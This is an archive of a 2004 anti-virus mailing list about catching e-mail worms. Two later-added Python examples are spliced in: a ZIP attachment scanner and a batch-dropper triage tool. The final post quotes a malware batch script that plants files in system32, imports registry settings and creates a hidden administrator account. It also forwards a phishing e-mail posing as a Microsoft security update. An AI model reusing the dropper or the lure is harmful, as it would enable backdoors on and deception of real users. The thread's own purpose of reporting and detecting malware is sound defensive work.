Re: [Declude.Virus] Keep sending out viruses notice for forging virus?

2004-05-04 Thread R. Scott Perry

Do I need to change all the similar lines to just 1 space or tab,
like BANEXT EZIP? Will it work if there is more than 1 space?
Only the commands in the .eml files have the one space/tab limitation.
   -Scott
---
Declude JunkMail: The advanced anti-spam solution for IMail mailservers 
since 2000.
Declude Virus: Ultra reliable virus detection and the leader in mailserver 
vulnerability detection.
Find out what you've been missing: Ask for a free 30-day evaluation.

---
[This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)]
---
This E-mail came from the Declude.Virus mailing list.  To
unsubscribe, just send an E-mail to [EMAIL PROTECTED], and
type unsubscribe Declude.Virus.The archives can be found
at http://www.mail-archive.com.


RE: [Declude.Virus] 8.11 possible problem

2004-05-04 Thread R. Scott Perry

Nothing looks wrong, I've just had that one instance of a .cpl making it
through (and it was, of course, virus-laden).
Do you have the Declude Virus log file entries for the E-mail?
   -Scott


RE: [Declude.Virus] 8.11 possible problem

2004-05-04 Thread R. Scott Perry

Unfortunately, no.  I'm not able to identify which e-mail it was - McAfee or
human error (I actually believe McAfee) blew the e-mail away.
In that case, I can't think of anything that you can do to track down what 
happened.  Without the E-mail that got through or log file entries to work 
with, I can come up with some possible scenarios as to what happened, but 
it probably wouldn't even be possible to prove or disprove any of them.

   -Scott


[Declude.Virus] Bagle.Y In ZIP File Got By?

2004-05-04 Thread Dan Star
Bagle.Y in a ZIP file got by our Declude scanner.  Should this be caught 
by Declude?

Dan



Re: [Declude.Virus] Bagle.Y In ZIP File Got By?

2004-05-04 Thread R. Scott Perry

Bagle.Y in a ZIP file got by our Declude scanner.  Should this be caught 
by Declude?
Every virus should be caught by Declude.  What does your Declude Virus log 
file say for the E-mail?  Are your virus definitions up-to-date?  Are you 
running the latest beta of Declude Virus, with a line BANEXT EZIP in the 
\IMail\Declude\virus.cfg file?

   -Scott
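As an added example (not Declude code and not from the original thread): a small Python scanner showing the kind of check a BANEXT EZIP rule performs, on my reading of EZIP as "executable inside a ZIP attachment" (an assumption; the banned-extension list, the message and the archive are all constructed here). It decides by content rather than by the declared filename or content type, handles double extensions such as photo.jpg.exe, and still lists member names when the archive is password-protected, because ZIP keeps names unencrypted in the central directory.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions treated as executable content. A constructed subset; Declude's
# own BANEXT list is not reproduced here.
BANNED_EXTS = {"exe", "scr", "pif", "cpl", "com", "bat", "cmd", "vbs", "js", "hta"}

ZIP_MAGIC = b"PK\x03\x04"   # local file header signature at offset 0


def is_banned_name(name: str) -> bool:
    """True if the LAST extension of a path is on the banned list, so a
    double extension such as 'photo.jpg.exe' is caught."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        return False
    return base.rsplit(".", 1)[-1].lower() in BANNED_EXTS


def scan_zip(data: bytes) -> list:
    """Findings for a ZIP payload: banned member names, encrypted members,
    or a corrupt archive. Names are read from the central directory, which
    is never encrypted, so a password-protected archive still reveals them."""
    findings = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if is_banned_name(info.filename):
                    findings.append(("EZIP", info.filename))
                if info.flag_bits & 0x1:          # general-purpose bit 0: encrypted
                    findings.append(("ENCRYPTED", info.filename))
    except zipfile.BadZipFile:
        findings.append(("BADZIP", ""))
    return findings


def scan_message(raw: bytes) -> list:
    """Walk every MIME leaf part and return (finding, detail) tuples."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True)
        if not payload:
            continue
        name = part.get_filename() or ""
        if is_banned_name(name):
            findings.append(("BANEXT", name))
        # Decide by content: a ZIP renamed to .dat or declared as
        # application/octet-stream still starts with the PK signature.
        if payload.startswith(ZIP_MAGIC):
            findings.extend(scan_zip(payload))
    return findings


def build_sample(zip_name: str, member: str, pwd: bool = False) -> bytes:
    """Constructed sample message carrying a ZIP with one fake-PE member.
    With pwd=True the encryption flag is set in both headers by hand, which
    is enough to exercise the listing path (zipfile resets flags on write)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(zipfile.ZipInfo(member), b"MZ" + b"\0" * 64)
    data = bytearray(buf.getvalue())
    if pwd:
        for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            data[data.find(sig) + off] |= 0x1
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Re: your document"
    msg.set_content("See attached.")
    msg.add_attachment(bytes(data), maintype="application",
                       subtype="octet-stream", filename=zip_name)
    return bytes(msg)


if __name__ == "__main__":
    print(scan_message(build_sample("photo.zip", "photo.jpg.exe")))
    print(scan_message(build_sample("update.dat", "patch.exe", pwd=True)))
```

A gateway rule built this way should also refuse archives it cannot parse at all (the BADZIP finding) rather than passing them through, since a deliberately malformed header is a cheap way to slip past a name-only check.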


Re: [Declude.Virus] Bagle.Y In ZIP File Got By?

2004-05-04 Thread Dan Star
On 5/4/2004 11:00 AM, R. Scott Perry wrote:

Bagle.Y in a ZIP file got by our Declude scanner.  Should this be 
caught by Declude?

Every virus should be caught by Declude.  What does your Declude Virus 
log file say for the E-mail?  Are your virus definitions up-to-date?  
Are you running the latest beta of Declude Virus, with a line BANEXT 
EZIP in the \IMail\Declude\virus.cfg file?

I wasn't aware of the BANEXT EZIP option.  Thanks for pointing that out.
Dan
[AUTOMATED NOTE: Your mail server [208.44.131.161] is missing a reverse DNS entry. All 
Internet hosts are required to have a reverse DNS entry. The missing reverse DNS entry 
will cause your mail to be treated as spam on some servers, such as AOL.]


[Declude.Virus] New virus?

2004-05-04 Thread Adrian Hauri
I've just received a fake Microsoft email with a 744 KB patch attached.
It was not detected by my Norton, nor by F-Prot, AVG or McAfee.

In this patch it has a start batch file which does this:

@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup Administrators system_support /ADD
cls
UPDATE.EXE
cls
exit

I've attached the email without the virus so you can have a look at it.

Adrian
---BeginMessage---
Critical announcements

An important security announcement to all Microsoft Windows users!

Critical Security Update for Microsoft Windows (KB2856093)

A critical security issue has been identified that could allow an attacker to compromise a computer running Windows and gain control over your system and files. This issue has been discussed in KB2856093 Microsoft Knowledge Base. Microsoft Security Response Team recommends to protect your computer by installing this update from Microsoft.

Patch Information:

Type: Critical Security Update
Vulnerability: High
Vendor notified: April 29, 2004
Update Release Date: May 02, 2004
Download Size: 744 KB, 2 minutes @ 28.8 modem
File Name: WINDOWS-KB2856093-X86-ENU.EXE
Affected Versions: Microsoft Windows 95/98/ME/NT/2000/XP/2003

To install this update, follow these instructions:

1. Download WINDOWS-KB2856093-X86-ENU.EXE file from Windows Update site or open an attached file.
2. Launch WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen instructions.
3. After you install this item, you may have to restart your computer, to ensure a full protection.

©2004 Microsoft Corporation. All rights reserved.
Terms of Use | Privacy Statement
---End Message---
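As an added example, not from the thread and not any vendor's code: a Python triage helper that reads the dropper's batch file quoted in the post above (embedded verbatim; everything else here is constructed) and pulls out what it changes on the host without executing it: the files copied into %windir%\system32, the silent registry import, the account it creates and its promotion to Administrators, and the binary launched afterwards. The correlation in backdoor_admins (an account both created and added to Administrators by the same script) is the finding a responder would act on first.

```python
# The batch file from the post, embedded verbatim so the example runs offline.
DROPPER_BAT = r"""@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup Administrators system_support /ADD
cls
UPDATE.EXE
cls
exit
"""

# Commands that carry no host-level effect worth recording.
NOISE = {"@echo", "echo", "cls", "exit", "rem", "::"}


def triage_batch(text: str) -> dict:
    """Static triage of a batch dropper. Returns indicator lists keyed by
    effect type; nothing is executed and %vars% are kept as written."""
    ind = {"files_dropped": [], "reg_imports": [], "accounts_added": [],
           "group_changes": [], "launches": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split()
        cmd = parts[0].lower()
        if cmd in NOISE:
            continue
        flags = {p.upper() for p in parts if p.startswith("/")}
        if cmd == "copy" and len(parts) >= 3:
            ind["files_dropped"].append((parts[1], parts[2]))        # (source, destination)
        elif cmd in ("regedit", "regedit.exe") and "/S" in flags:
            ind["reg_imports"].append(parts[-1])                      # silent .reg import
        elif cmd == "net" and len(parts) >= 3:
            sub = parts[1].lower()
            if sub == "user" and "/ADD" in flags:
                ind["accounts_added"].append(parts[2])
            elif sub == "localgroup" and "/ADD" in flags and len(parts) >= 4:
                ind["group_changes"].append((parts[2], parts[3]))     # (group, member)
        else:
            ind["launches"].append(line)                              # anything else is run as-is
    return ind


def backdoor_admins(ind: dict) -> list:
    """Accounts the script both creates and places in Administrators."""
    promoted = {m for g, m in ind["group_changes"] if g.lower() == "administrators"}
    return [a for a in ind["accounts_added"] if a in promoted]


if __name__ == "__main__":
    indicators = triage_batch(DROPPER_BAT)
    for key, items in indicators.items():
        print(f"{key}: {items}")
    print("backdoor admin accounts:", backdoor_admins(indicators))
```

The destination paths and the account name are what to sweep other hosts for; the launched UPDATE.EXE is the part this script tells you nothing about, so it needs to be pulled from the original attachment and analysed separately.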